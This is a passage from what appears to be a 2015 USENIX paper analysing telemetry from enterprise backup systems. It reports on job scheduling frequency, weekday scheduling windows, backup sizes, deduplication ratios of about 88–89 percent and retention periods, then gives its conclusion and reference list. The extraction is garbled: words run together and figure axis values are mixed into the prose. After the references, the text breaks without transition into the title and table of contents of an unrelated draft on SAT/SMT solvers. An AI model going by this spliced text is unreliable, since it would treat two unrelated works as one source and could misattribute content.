grate, duplicate, or delete them. Due to the data transferof backup images, these jobs processed 4.88 Exabytes ofdata. We analyze individual job sizes in Section 6.
5.2 Scheduling frequency
Observation 5: Full backups tend to occur every 5
days or fewer. Recovery operations occur for few do-mains, on a weekly or monthly basis.
A factor indicative of data churn in a backup domain
is the rate at which jobs are scheduled to backup, restore,or manage backed-up data. To quantify the scheduling
frequency of different job types for a given domain, we
0102030405060708090100
0 5 10 15 20 25 30 35 40 45 50 55 60 65
Job scheduling frequency (days)Cum. percentage of domains     Management operations (Mean: 3 days)
< 5 Recovery operations (Mean: 24 days)
≥ 5 Recovery operations (Mean: 6 days)
Incremental backups (Mean: 2 days)
Full backups (Mean: 5 days)
Snapshot operations (Mean: 5 days)Figure 9: Distribution of the average scheduling fre-
quency of different job types across backup domains.Recovery operations are broken into two groups of do-mains with more, and less than 5 recovery operations
each. Despite being of similar size, the characteristics
of each group differ significantly.
rely on the starting times of individual jobs. Specifi-
cally, starting times are used to estimate the average oc-
currence rate of different jobs of each domain policy, onindividual clients. In Figure 9, we show the distributions
of the scheduling frequency of different job types across
backup domains.
Overall, we find that the average frequency of recovery
operations differs depending on their number. In Figure
9, we show the distributions of the recovery frequency
for two domain groups having recovered data more, and
less than 5 times. The former group consists of 337 do-mains that recovered data 17 times on average, and the
latter consists of 262 domains with 3 recovery operations
on average. By definition, our analysis excludes an addi-tional 676 domains that initiate recovery only once. For
domains with multiple events, the distribution of their
frequency spans 1-2 weeks, with an average of 6 days.On the other hand, domains with fewer recovery opera-
tions perform them significantly less frequently, up to 2
months apart and every 24 days on average. Since recov-ery operations are initiated manually by users, we have
no accurate way of pinpointing their cause. These re-
sults, however, suggest that frequent recovery operations
may be attributed to disaster recovery testing, while in-
frequent ones may be due to actual disasters. Interest-ingly, both domain groups are equally small, but whendomains with a single recovery event are factored in, the
group of infrequent recovery operations doubles in size.
In the case of backup jobs, the general belief is that
systems in the field rely on weekly full backups, comple-
mented by daily incremental backups [11, 36, 67]. Our
results confirm this assumption for incremental backups,
which take place every 1-2 days in 81% of domains.Daily incremental backups are also the default optionin NetBackup. For full backups, however, our analysis
shows that only 17% of domains perform them every 6-8
158 2015 USENIX Annual Technical Conference USENIX Association0250500750100012501500
<2 2−4 4−6 6−8 8−10 10−12 >12
Full backup scheduling frequency (days)Average backup size (GB)Mean
Median
1.5 IQRMean
Median
1.5 IQR
Figure 10: Tukey boxplots (without outliers) that repre-sent the average size of full backup jobs, for different jobscheduling frequencies. Means for each boxplot are alsoshown. Frequent full backups seem to be associated with
larger job sizes, suggesting that they may be preferred as
a response to high data churn.
days on average. Instead, the majority of domains per-
form full backups more often: 15% perform them every
1-2 days, and 57% perform them every 2-6 days. This
is despite the fact that weekly full backups is the defaultoption. As expected, management operations take place
on a daily or weekly basis, since they usually follow (or
precede) an incremental or full backup operation. Snap-
shot operations display a similar trend to full backups, as
they are mostly used by clients in lieu of the latter.
Of the 65% of domain policies that perform full back-
ups every 6 days or fewer, only 33% also perform in-
cremental backups at all. On the other hand, 76% ofpolicies that perform weekly full backups also rely on
incremental backups. To determine whether full back-
ups are performed frequently to accommodate high data
churn, we group average full backup sizes per client pol-
icy according to their scheduling frequency, and present
the results as a series of boxplots in Figure 10. Notethat regardless of frequency, full backups tend to be small
(medians in the order of a few gigabytes), due to the effi-
ciency of deduplication. However, the larger percentiles
of each distribution show that larger backup sizes tendto occur when full backups are taken more frequentlythan once per week. While this confirms our assump-
tion of high data churn for a fraction of the clients, the
remaining small backup sizes could also be attributed
to overly conservative configurations, a sign that policy
auto-configuration is an important feature for future dataprotection systems.
5.3 Scheduling windows
Observation 6: Users prefer default scheduling win-
dows during weekdays, resulting in nightly bursts of ac-tivity. Default values are overridden, however , to avoid
scheduling jobs during the weekend.
Another important factor for characterizing the work-0.00.20.40.60.81.01.21.41.6
Mon
12am
12pm
Tue
12am12pm
Wed
12am
12pm
Thu
12am12pm
Fri
12am
12pm
Sat
12am12pm
Sun
12am
12pm
Mon
12amHour of the weekSched. probability (%)
Figure 11: Probability density function for scheduling
policy jobs at a given hour of a given day of the week.Policies tend to be configured using the default schedul-ing windows at 6pm and 12am, resulting in high system
load during those hours.
load of a backup system is the exact time jobs are sched-
uled. A popular belief is that backup operations take
place late at night or during weekends, when client sys-
tems are expected to be idle [15, 66]. In Figure 11, we
show our findings for all the jobs in our dataset. Thepresented density function was computed by normalizing
the number of jobs that take place in a given domain, to
prevent domains with more jobs from affecting the over-all trend disproportionately. We note that this normaliza-
tion had minimal effect on the result, which suggests that
the presented trend is common across domains.
The hourly scheduling frequency is similar for each
day, although there is less activity during the weekend.
We also find that the probability of a job being sched-
uled is highest starting at 6pm and 12am on a weekday.We attribute the timing of job scheduling to customers
using the default scheduling windows suggested by Net-
Backup, which start at 6pm and 12am every day. Thechoice to exclude weekends, however, seems to be an
explicit choice of the user. This result suggests that auto-
mated job scheduling, where the only constraints wouldbe to leverage device idleness [4, 26, 48], would be more
practical, allowing the system to schedule jobs so that
such activity bursts are avoided.
While Figure 11 merges all job types, different jobs
exhibit different scheduling patterns, as shown in Figure9. Our data, however, does not allow a matching of job
types to scheduling times at a granularity finer than the
day on which the job was scheduled. Thus, we partitionjobs based on their type, and in Figure 12 we show the
probability that a job of a given type will be scheduled on
a given day of the week. We find that incremental back-
ups are scheduled to complement full backups, as they
tend to get scheduled from Monday to Thursday, whilefull backups are mostly scheduled on Fridays. Note that
the latter does not contradict our previous result of full
backups that take place more often than once a week,
USENIX Association  2015 USENIX Annual Technical Conference 1590.02.55.07.510.012.515.017.520.022.525.0
Mon Tue Wed Thu Fri Sat Sun
Day of the weekSched. probability (%)Management operations
Recovery operationsIncremental backupsFull backups
Figure 12: Probability of a policy job occurring on a
given day of the week, based on its type. Incrementalbackups tend to be scheduled to complement full back-ups, while users initiate recovery operations more fre-
quently at the beginning of the week.
0102030405060708090100
1 2 4 8 16 32 64 128 256 512 1024
Average gigabytes transferred per jobCum. percentage of domainsManagement operations (Mean: 32.9GB)
Incremental backups (Mean: 34.9GB)Full backups (Mean: 47.1GB)Recovery operations (Mean: 51.8GB)
Figure 13: Distribution of the average job size of a given
job type across backup domains, after the data has been
deduplicated at the client side. Incremental backups re-
semble full backups in size.
as the probability of scheduling full backups any other
day is still comparatively high. Recovery operations also
take place within the week, with a slightly higher proba-
bility on Tuesdays (which we confirmed as not related toPatch Tuesday [49]). Finally management operations do
not follow any particular trend and are equally likely to
be scheduled on any day of the week.
6 Backup data growth
Characterizing backup data growth is crucial for estimat-
ing the amount of data that needs to be transferred andstored, which allows for efficient provisioning of stor-
age capacity and bandwidth. Towards this goal, we ana-
lyze the sizes and number of files of different job types,and their deduplication ratios across backup domains. Fi-
nally, we look into the time that backup data is retained.
6.1 Job sizes and number of files
Observation 7: Incremental and full backups tend to be
similar in size and files transferred, due to the effective-
ness of deduplication, or misconfigurations. Recovery
jobs restore either a few files, or entire volumes.0102030405060708090100
100101102103104105106107
Average number of files transferred per jobCum. percentage of domainsManagement operations
(Mean: 11724 files)
Incremental backups
(Mean: 52033 files)
Full backups
(Mean: 75916 files)
Recovery operations
(Mean: 73223 files)
Figure 14: Distributions of average number of files trans-
ferred per job, across different job types. The trends areconsistent with those for job sizes (Figure 13).
An obvious factor when estimating a domain’s data
growth is the size of backup jobs. In Figure 13, we showthe distributions of the average number of bytes trans-ferred for different job types across all domains, after the
data has been deduplicated at the client. Averages for
each operation are shown in the legend, and marked onthe x axis. Snapshot operations are not included, as they
do not incur data transfer.
Surprisingly, incremental backups resemble full back-
ups in size. Although the distribution of full backups
is skewed toward larger job sizes, 29% of full backups
on domains that also perform incremental backups tend
to be equal or smaller in size than the latter, 21% rangefrom 1−1.5 times the size of incremental backups, and
the remainder range from 1.5 −10
6times. We attribute
the small size difference to three reasons. First, systems
with low data churn can achieve high deduplication rates,
which are common as we show in Section 6.2. Second,misconfigured policies or volumes that do not support
incremental backups often fall back to full backups, as
suggested by support tickets. Third, maintenance appli-
cations, such as anti-virus scanners, can update file meta-data making unchanged files appear modified. Overall,
the average backup job sizes in Figure 13 are 5-8 times
smaller than the file sizes reported by Wallace et al. [66],likely due to their study considering the sizes of all files
in the file system storing the backup images.
Since recovery operations can be triggered by users to
recover an entire volume or individual files, the distribu-
tion of recovery job sizes is not surprising. 32% of recov-
ery jobs restore less than 1GB, while the average job can
be as large as 51GB. Finally, management operations,
which consist mostly of metadata backups (95.7%), butalso backup image (1.5%) and snapshot (2.8%) duplica-
tion operations, are much smaller than all other opera-
tions, as expected.
Figure 14 shows the distributions of the average num-
ber of files transferred for different job types in each do-main. Similar to job sizes, the average number of filestransferred per incremental backup is 31% smaller than
160 2015 USENIX Annual Technical Conference USENIX Association0102030405060708090100
0 10 20 30 40 50 60 70 80 90 100
Average daily deduplication ratio (%)Cum. percentage of domainsManagement operations (Mean: 66.8%)
Incremental backups (Mean: 88.1%)Full backups (Mean: 89.1%)
Figure 15: Distributions of the average daily deduplica-
tion ratio of different job types, across backup domains.Incremental and full backups observe high deduplicationratios, while the uniqueness of metadata backups (man-
agement operations) makes them harder to deduplicate.
that for full backups, and both job types are characterized
by similar CDF curves. Recovery operations transfer as
many files as full backups on average, yet the majority
transfer fewer than 200 files. This is in line with ourresults on recovery job sizes. Given that large recovery
jobs also occur less frequently, these results suggest that
most recovery operations are not triggered as a disasterresponse, but rather to recover data lost due to errors, or
to test the recoverability of backup images. Management
operations, being mostly metadata backups, transfer sig-nificantly fewer files than other job types on average.
6.2 Deduplication ratios
Observation 8: Deduplication can result in the reduc-
tion of backup image sizes by more than 88%, despite
average job sizes ranging in the tens of gigabytes.
For clients that use NetBackup’s deduplication solu-
tion, we analyzed the daily deduplication ratios of jobs,
i.e. the percentage by which the number of bytes trans-ferred was reduced due to deduplication. Figure 15
shows the distributions of the average daily deduplication
ratio for management operations, full, and incremental
backups across backup domains. Recovery and snapshotjobs are not included as the notion of deduplication does
not apply. Since deduplication happens globally across
backup images, deduplication ratios for backups tend toincrease after the first few iterations of a policy. In gen-
eral, sustained deduplication ratios as high as 99% are
not unusual. Across all domains in our dataset, however,
the average daily deduplication ratio is 88-89%, for both
full and incremental backups. It is interesting to note thatdespite such high deduplication ratios, jobs in the order
of tens of gigabytes are common (Figure 13), suggesting
that even for daily incremental jobs, the actual job sizesare an order of magnitude larger in size. These results
are in agreement with previous work [66], which reports
average deduplication ratios of 91%.0102030405060708090100
1 day
2
3
1 week
23
1 mo
23
6
1 year
2
3
5
Retention periodCum. percentage of jobsManagement operations
(Mean: 16 days)
Incremental backups
(Mean: 25 days)
Full backups
(Mean: 40 days)
Snapshot operations
(Mean: 37 days)
Figure 16: Distributions of retention period lengths for
different job types. 3% of jobs have infinite retention pe-riods. Incremental backups are typically retained for al-most half the time of full backups, the majority of which
are retained for months.
Finally, for management operations the average dedu-
plication ratio is 68%. Since only 1.1% of domains that
use deduplication enable it for management operations,
we do not attach much importance to this result. For
the reported domains, however, it can be attributed to the
uniqueness of metadata backups, which do not share files
with other backup images on the same backup domain
and consist of large binary files.
6.3 Data retention
Observation 9: Incremental backups are retained for
weeks, while full backups are retained for months and
retention depends on their scheduling frequency.
Another factor characteristic of backup storage growth
is the retention time for backup images, which is a con-figurable policy parameter. Once a backup image ex-
pires, the master server deletes it from backup storage.
We have analyzed the retention periods assigned to each
job in our telemetry reports, and show the distributions
of retention period lengths for different job types in Fig-ure 16. Our initial observation is that job retention pe-
riods coincide with the values available by default in
NetBackup, although users can specify custom periods.
These values range from 1 week to 1 year, and corre-spond to the steps in the CDF shown. While federal laws,such as HIPAA [63] and FoIA [64], require minimum re-
tention from a few years up to infinity for certain types
of data. In our case, 3% of jobs are either assigned cus-
tom retention periods longer than 1 year, or are retained
indefinitely. On the other extreme, only 3% of jobs areassigned custom retention periods shorter than 1 week.
Previous work confirms our findings, by reporting simi-
lar ages for backup image files [66].
In particular, management operations (metadata back-
ups and backup image duplicates) are mostly retained for1 week. Incremental backups are mostly retained for 2weeks, the default option. Full backups and snapshots,
USENIX Association  2015 USENIX Annual Technical Conference 161on the other hand, are more likely retained for months.
Overall, 94% of jobs select a preset retention period fromNetBackup’s list, and 35% of jobs keep the default sug-gestion of 2 weeks. This suggests that the actual reten-tion period length is not a crucial policy parameter.
Finally, we find a strong correlation (Pearson’s r=
0.53) between the length of retention periods for fullbackups, and the frequency with which they take place.
Specifically, we find that clients taking full backups less
frequently retain them for longer periods of time. On the
other hand, no such correlation exists for management
operations and incremental backups. This is because al-most all data resulting from a management operation isretained for 1 week (Figure 16), and almost all incre-mental backups are performed with a frequency of 1-2days apart (Figure 9). The correlation of retention period
length and frequency of full backup operations, coupled
with the preference for default values, may suggest that
retention periods are selected as a function of storage ca-
pacity, or that they are at least limited by that factor.
7 Insight: next-generation data protection
This section outlines five major directions for futurework on data protection systems. In each case, we iden-
tify existing literature and describe how our findings en-
courage future work.
Automated configuration and self-healing. To allevi-
ate performance and availability problems of data pro-
tection systems, existing work uses historical data to
perform automated storage capacity planning [9], data
prefetching and network scheduling [25]. Our findingssupport this line of work. We have shown that backup do-
mains grow in bursts, and client policies are either con-
figured using default values, misconfigured, or not con-
figured at all. As a result, clients are left unprotected,
jobs are scheduled in bursts, and users are not warned of
imminent problems. To enable automated policy config-uration and self-healing data protection systems, furtherresearch is necessary.
Deduplication. Our findings confirm the efficiency of
deduplication at reducing backup image sizes. We fur-
ther show that in many systems, incremental backups arereplaced by frequent full, deduplicated backups. This is
likely due to the adoption of deduplication, which im-
proves on incremental backups by looking for duplicatesacross all backup data in the domain. To completely re-place incremental backups, however, it is necessary toimprove on the time required to restore the original datafrom deduplicated storage, which directly affects recov-
ery times. Currently, this is an area of active research
[24, 35, 43, 50].
Efficient storage utilization. Our analysis shows that
job retention periods are selected as a function of backupfrequency, likely to ensure sufficient backup storage
space will be available. Additionally, 31% of domainsin our dataset use dedicated backup appliances (PBBAs),a market currently experiencing growth [33]. We believe
that storage capacity in these dedicated systems should
be utilized fully, and retention periods should be dynam-ically adjusted to fill it, providing the ability to recoverolder versions of data. In this direction, related work onstream-processing systems [29] could be adapted to theneeds of backup data.
Accident insurance. Most recovery operations in our
dataset appear to be small in both the number of files and
bytes they recover, compared to their respective backups.This result suggests that recovery operations are mostly
triggered to restore a few files, or to test the integrity of
backup images. This motivates us to re-examine the re-quirement of instant recovery for backup systems as aproblem of determining which data is more likely to be
recovered, and storing it closer to clients [40, 45].
Content-aware backups. Data protection strategies can
generate data at a rate up to 5 times higher than produc-
tion data growth [1]. This is due to the practice of creat-
ing multiple copies and backing up temporary files used
for test-and-development or data analytics processes,such as the Shuffle stage of MapReduce tasks [10]. De-
pending on the storage interface used, it might be more
efficient to recompute these datasets rather than restor-ing them from backup storage. Another challenge for
contemporary backup software is detecting data changes
since the last backup among PBs of data and billions of
files [31]. By augmenting data protection systems to ac-
count for data types and modification events, we can po-
tentially reduce the time needed to complete backup and
restore operations.
8 Conclusion
We investigated an extensive dataset representing a di-verse population of enterprise data protection systemsto demonstrate how these systems are configured and
evolved over time. Among other results, our analysis
showed that these systems are usually configured to pro-
tect one type of data, and while their client population
growth is steady and bursty, their backup policies don’tchange. With regards to job scheduling, we find that
the popularity of default values can have an adverse ef-
fect on the efficiency of the system by creating burstyworkloads. Finally, we showed that full and incremental
backups tend to be similar in size and number of files,
as a result of efficient deduplication and misconfigura-tions. We hope that our data and the proposed areas of
future research will enable researchers to simulate realis-
tic scenarios for building next generation data protection
systems that are easy to configure and manage.
162 2015 USENIX Annual Technical Conference USENIX AssociationAcknowledgments
The study would not be possible without the teleme-
try data collected by Symantec’s NetBackup team, and
we thank Liam McNerney and Aaron Christensen fortheir invaluable assistance in understanding the data. Wealso thank the four anonymous reviewers and our shep-herd, Fred Douglis, for helping us improve our paper
significantly. Finally, we would like to thank Petros
Efstathopoulos, Fanglu Guo, Vish Janakiraman, Ash-win Kayyoor, CW Hobbs, Bruce Montague, Sanjay Sah-wney, and all other members of Symantec’s ResearchLabs for their feedback during the earlier stages of ourstudy.
References
[1]ACTIFIO . Actifio Copy Data Virtualization: How It
Works, August 2014.
[2]AGRAWAL , N., B OLOSKY , W. J., D OUCEUR , J. R.,
AND LORCH , J. R. A five-year study of file-system meta-
data. In Proceedings of the 5th USENIX Conference on
File and Storage Technologies (2007).
[3]ARCSERVE . arcserve Unified Data Protection. http:
//www.arcserve.com, May 2014.
[4]BACHMAT , E., AND SCHINDLER , J. Analysis of meth-
ods for scheduling low priority disk drive tasks. In Pro-
ceedings of the 2002 ACM SIGMETRICS International
Conference on Measurement and modeling of computer
systems (2002).
[5]BACULA SYSTEMS . Bacula 7.0.5. http://www.
bacula.org, July 2014.
[6]BAKER , M., H ARTMAN , J. H., K UPFER , M. D.,
SHIRRIFF , K., AND OUSTERHOUT , J. K. Measure-
ments of a Distributed File System. In Proceedings of the
13th ACM Symposium on Operating Systems Principles(1991).
[7]B
ENNETT , J. M., B AUER , M. A., AND KINCHLEA , D.
Characteristics of Files in NFS Environments. In Pro-
ceedings of the 1991 ACM SIGSMALL/PC Symposium onSmall Systems (1991).
[8]B
HATTACHARYA , S., M OHAN , C., B RANNON , K. W.,
NARANG , I., H SIAO , H.-I., AND SUBRAMANIAN , M.
Coordinating Backup/Recovery and Data ConsistencyBetween Database and File Systems. In Proceedings
of the 2002 ACM SIGMOD International Conference onManagement of Data (2002), SIGMOD.
[9]C
HAMNESS , M. Capacity Forecasting in a Backup Stor-
age Environment. In Proceedings of the 25th Interna-
tional Conference on Large Installation System Adminis-tration (2011).[10] C
HEN,Y . ,A LSPAUGH , S., AND KATZ, R. Interactive
Analytical Processing in Big Data Systems: A Cross-
industry Study of MapReduce Workloads. Proc. VLDB
Endow. 5, 12 (Aug. 2012), 1802–1813.
[11] CHERVENAK , A. L., V ELLANKI , V., AND KURMAS ,
Z. Protecting File Systems: A Survey Of Backup Tech-
niques. In Proceedings of the Joint NASA and IEEE Mass
Storage Conference (1998).
[12] COMM VAULT SYSTEMS . Get Smart About Big Data: In-
tegrated Backup, Archive & Reporting to Solve Big Data
Management Problems, July 2013.
[13] COMM VAULT SYSTEMS INC. CommVault Sim-
pana 10. http://www.commvault.com/simpana-
software, April 2014.
[14] COMM VAULT SYSTEMS INC. CommVault Simpana:
Solutions for Protecting and Managing Business Ap-plications. http://www.commvault.com/solutions/
enterprise-applications, April 2015.
[15]
DASI LVA, J., G UDMUNDSSON , O., AND MOSS ́E, D.
Performance of a Parallel Network Backup Manager,
1992.
[16] DASI LVA, J., AND GUTHMUNDSSON , O. The Amanda
Network Backup Manager. In Proceedings of the 7th
USENIX Conference on System Administration (1993),
LISA.
[17] DELL INC. Dell NetVault 10.0. http://software.
dell.com/products/netvault-backup, May 2014.
[18] DIMENSIONAL RESEARCH . The state of IT recov-
ery for SMBs. http://axcient.com/state-of-it-
recovery-for-smbs, Oct. 2014.
[19] DOUCEUR , J. R., AND BOLOSKY , W. J. A Large-scale
Study of File-system Contents. In Proceedings of the
1999 ACM SIGMETRICS International Conference on
Measurement and Modeling of Computer Systems (1999).
[20] DOUGLIS , F., B HARDWAJ , D., Q IAN, H., AND SHI-
LANE , P. Content-aware Load Balancing for Distributed
Backup. In Proceedings of the 25th International Confer-
ence on Large Installation System Administration (2011),
LISA.
[21] EMC C ORPORATION . EMC NetWorker 8.2. http://
www.emc.com/data-protection/networker.htm,
July 2014.
[22] EMC C ORPORATION . EMC ProtectPoint: Protection
Software Enabling Direct Backup from Primary Storageto Protection Storage, 2014.
[23] EMC C
ORPORATION . EMC NetWorker Appli-
cation Modules Data Sheet. http://www.emc.
com/collateral/software/data-sheet/h2479-networker-app-modules-ds.pdf , January 2015.
USENIX Association  2015 USENIX Annual Technical Conference 163[24] FU, M., F ENG, D., H UA, Y., H E, X., C HEN, Z., X IA,
W., H UANG , F., AND LIU, Q. Accelerating Restore and
Garbage Collection in Deduplication-based Backup Sys-
tems via Exploiting Historical Information. In Proceed-
ings of the 2014 USENIX Conference on USENIX AnnualTechnical Conference (2014).
[25] G
IAT, A., P ELLEG , D., R AICHSTEIN , E., AND RONEN ,
A. Using Machine Learning Techniques to Enhance the
Performance of an Automatic Backup and Recovery Sys-
tem. In Proceedings of the 3rd Annual Haifa Experimen-
tal Systems Conference (2010), SYSTOR.
[26] GOLDING , R., B OSCH , P., S TAELIN , C., S ULLIV AN , T.,
AND WILKES , J. Idleness is not sloth. In Proceedings
of the USENIX 1995 Technical Conference Proceedings
(1995), TCON’95.
[27] HEWLETT -PACKARD . Rethinking backup and recovery
in the modern data center, November 2013.
[28] HEWLETT -PACKARD COMPANY . HP Data Protector
9.0.1. http://www.autonomy.com/products/data-
protector, August 2014.
[29] HILDRUM , K., D OUGLIS , F., W OLF, J. L., Y U, P. S.,
FLEISCHER , L., AND KATTA , A. Storage Optimization
for Large-scale Distributed Stream-processing Systems.Trans. Storage 3, 4 (Feb. 2008), 5:1–5:28.
[30] H
SU, W. W., AND SMITH , A. J. Characteristics of
I/O Traffic in Personal Computer and Server Workloads.Tech. rep., EECS Department, University of California,Berkeley, 2002.
[31] H
UGHES , D., AND FARROW , R. Backup Strategies for
Molecular Dynamics: An Interview with Doug Hughes.Proc. USENIX ;login: 36, 2 (Apr. 2011), 25–28.
[32] IBM C
ORPORATION . IBM Tivoli Storage Manager
7.1.http://www.ibm.com/software/products/en/
tivostormana, November 2013.
[33] INTERNATIONAL DATA CORPORATION . Worldwide
Purpose-Built Backup Appliance (PBBA) Market Rev-enue Increases 11.2% in the Third Quarter of 2014, Ac-cording to IDC. http://www.idc.com/getdoc.jsp?
containerId=prUS25351414, December 2014.
[34] I
RON MOUNTAIN . Data Backup and Recovery Bench-
mark Report. http://www.ironmountain.com/
Knowledge-Center/Reference-Library/View-by-Document-Type/White-Papers-Briefs/I/Iron-Mountain-Data-Backup-and-Recovery-Benchmark-Report.aspx, 2013.
[35] K
ACZMARCZYK , M., B ARCZYNSKI , M., K ILIAN , W.,
AND DUBNICKI , C. Reducing Impact of Data Fragmen-
tation Caused by In-line Deduplication. In Proceedings of
the 5th Annual International Systems and Storage Confer-ence (2012).[36] K
EETON , K., S ANTOS , C., B EYER , D., C HASE , J.,
AND WILKES , J. Designing for Disasters. In Proceed-
ings of the 3rd USENIX Conference on File and StorageTechnologies (2004), FAST.
[37] K
ILLICK , R., AND ECKLEY , I. A. changepoint: An R
package for Changepoint Analysis. In Journal of Statisti-
cal Software (May 2013).
[38] KOLSTAD , R. A Next Step in Backup and Restore Tech-
nology. In Proceedings of the 5th USENIX Conference on
System Administration (1991), LISA.
[39] LEUNG , A. W., P ASUPATHY , S., G OODSON , G., AND
MILLER , E. L. Measurement and Analysis of Large-
scale Network File System Workloads. In Proceedings of
the USENIX 2008 Annual Technical Conference (2008).
[40] LI, C., S HILANE ,P . ,D OUGLIS ,F . ,S HIM, H., S MAL-
DONE , S., AND WALLACE , G. Nitro: A Capacity-
Optimized SSD Cache for Primary Storage. In Proceed-
ings of the 2014 USENIX Annual Technical Conference
(2014), ATC.
[41] LI, M., Q IN, C., L EE, P. P. C., AND LI, J. Convergent
Dispersal: Toward Storage-Efficient Security in a Cloud-
of-Clouds. In Proceedings of the 6th USENIX Workshop
on Hot Topics in Storage and File Systems (2014), Hot-
Storage.
[42] LI, Z., G REENAN , K. M., L EUNG , A. W., AND ZADOK ,
E. Power Consumption in Enterprise-scale Backup Stor-
age Systems. In Proceedings of the 10th USENIX Con-
ference on File and Storage Technologies (2012), FAST.
[43] LILLIBRIDGE , M., E SHGHI , K., AND BHAGWAT , D.
Improving Restore Speed for Backup Systems that UseInline Chunk-Based Deduplication. In Proceeings of the
11th USENIX Conference on File and Storage Technolo-gies(2013), FAST.
[44] L
IN, X., L U, G., D OUGLIS ,F . ,S HILANE , P., AND
WALLACE , G. Migratory Compression: Coarse-grained
Data Reordering to Improve Compressibility. In Proceed-
ings of the 12th USENIX Conference on File and StorageTechnologies (2014), FAST.
[45] L
IU, J., C HAI, Y., Q IN, X., AND XIAO, Y. PLC-
cache: Endurable SSD cache for deduplication-based pri-mary storage. In Mass Storage Systems and Technologies
(MSST), 2014 30th Symposium on (2014).
[46] M
EISTER , D., B RINKMANN , A., AND S ̈USS, T. File
Recipe Compression in Data Deduplication Systems. In
Proceedings of the 11th USENIX Conference on File and
Storage Technologies (2013), FAST.
[47] MEYER , D. T., AND BOLOSKY , W. J. A Study of Prac-
tical Deduplication. In Proceedings of the 9th USENIX
Conference on File and Stroage Technologies (2011).
164 2015 USENIX Annual Technical Conference USENIX Association[48] MI, N., R ISKA , A., L I, X., S MIRNI , E., AND RIEDEL ,
E. Restrained utilization of idleness for transparent
scheduling of background tasks. In Proceedings of the
11th International Joint conference on Measurement and
modeling of computer systems (2009), SIGMETRICS.
[49] MICROSOFT CORPORATION . Understanding Windows
automatic updating. http://windows.microsoft.
com/en-us/windows/understanding-windows-
automatic-updating .
[50] NG, C.-H., AND LEE, P. P. C. RevDedup: A Reverse
Deduplication Storage System Optimized for Reads to
Latest Backups. In Proceedings of the 4th Asia-Pacific
Workshop on Systems (2013).
[51] OUSTERHOUT , J. K., D ACOSTA , H., H ARRISON , D.,
KUNZE , J. A., K UPFER , M., AND THOMPSON , J. G. A
Trace-driven Analysis of the UNIX 4.2 BSD File System.
InProceedings of the 10th ACM Symposium on Operating
Systems Principles (1985).
[52] PARK, N., AND LILJA, D. J. Characterizing Datasets for
Data Deduplication in Backup Applications. In Proceed-
ings of the IEEE International Symposium on Workload
Characterization (2010), IISWC.
[53] QUINLAN , S., AND DORWARD , S. Venti: A New Ap-
proach to Archival Data Storage. In Proceedings of the
1st USENIX Conference on File and Storage Technolo-gies(2002), FAST.
[54] R
OMIG , S. M. Backup at Ohio State, Take 2. In Proceed-
ings of the 4th USENIX Conference on System Adminis-
tration (1990), LISA.
[55] ROSELLI , D., L ORCH , J. R., AND ANDERSON , T. E. A
Comparison of File System Workloads. In Proceedings
of the USENIX Annual Technical Conference (2000).
[56] SATYANARAYANAN , M. A Study of File Sizes and Func-
tional Lifetimes. In Proceedings of the 8th ACM Sympo-
sium on Operating Systems Principles (1981).
[57] SHIM, H., S HILANE , P., AND HSU, W. Characterization
of Incremental Data Changes for Efficient Data Protec-
tion. In Proceedings of the 2013 USENIX Annual Techni-
cal Conference (2013), ATC.
[58] SMALDONE , S., W ALLACE , G., AND HSU, W. Effi-
ciently Storing Virtual Machine Backups. In Proceedings
of the 5th USENIX Workshop on Hot Topics in Storageand File Systems (2013), HotStorage.
[59] S
YMANTEC CORPORATION . Symantec NetBackup 7.6
Data Sheet: Data Protection. http://www.symantec.
com/content/en/us/enterprise/fact_sheets/b-netbackup-ds-21324986.pdf, January 2014.
[60] S
YMANTEC CORPORATION . Symantec NetBackup
7.6. http://www.symantec.com/backup-software,
March 2015.[61] SYMANTEC CORPORATION . Symantec NetBackup 7.6.1
Getting Started Guide. https://support.symantec.
com/en_US/article.DOC7941.html, February 2015.
[62] TARASOV , V., M UDRANKIT , A., B UIK, W., S HILANE ,
P., K UENNING , G., AND ZADOK , E. Generating Re-
alistic Datasets for Deduplication Analysis. In Proceed-
ings of the 2012 USENIX Annual Technical Conference
(2012), ATC.
[63] U.S. D EPARTMENT OF HEALTH AND HUMAN SER-
VICES . The Health Insurance Portability and Account-
ability Act. http://www.hhs.gov/ocr/privacy.
[64] U.S. D EPARTMENT OF JUSTICE . The Freedom of Infor-
mation Act. http://www.foia.gov.
[65] VANSON BOURNE . Virtualization Data Protection
Report 2013 – SMB edition. http://www.dabcc.com/
documentlibrary/file/virtualization-data-protection-report-smb-2013.pdf , 2013.
[66] W
ALLACE , G., D OUGLIS , F., Q IAN, H., S HILANE , P.,
SMALDONE , S., C HAMNESS , M., AND HSU, W. Char-
acteristics of Backup Workloads in Production Systems.
InProceedings of the 10th USENIX Conference on File
and Storage Technologies (2012).
[67] ZHU, B., L I, K., AND PATTERSON , H. Avoiding the
Disk Bottleneck in the Data Domain Deduplication FileSystem. In Proceedings of the 6th USENIX Conference
on File and Storage Technologies (2008).
[68] Z
MANDA INC. Amanda 3.3.6. http://amanda.
zmanda.com, July 2014.
[69] ZWICKY , E. D. Torture-testing Backup and Archive Pro-
grams: Things You Ought to Know But Probably WouldRather Not. In Proceedings of the 5th USENIX Confer-
ence on System Administration (1991), LISA.
[70] Z
WICKY , E. D. Further Torture: More Testing of Backup
and Archive Programs. In Proceedings of the 17th
USENIX Conference on System Administration (2003),
LISA.QuickintroductionintoSAT/SMTsolversandsymbolic
execution
DennisYurichev <dennis(a)yurichev.com>
December2015–May2017
Contents
1 This is a draft! 3
2 Thanks 3
3 Introduction 3
4 Is it a hype? Yet another fad? 3
5 SMT1-solvers 4
5.1 School-levelsystemofequations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4
5.2 Anotherschool-levelsystemofequations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5
5.3 ConnectionbetweenSAT2andSMTsolvers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5
5.4 Zebrapuzzle(AKA3Einsteinpuzzle) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5
5.5 Sudokupuzzle . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8
5.5.1 Thefirstidea . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9
5.5.2 Thesecondidea . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 12
5.5.3 Conclusion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 14
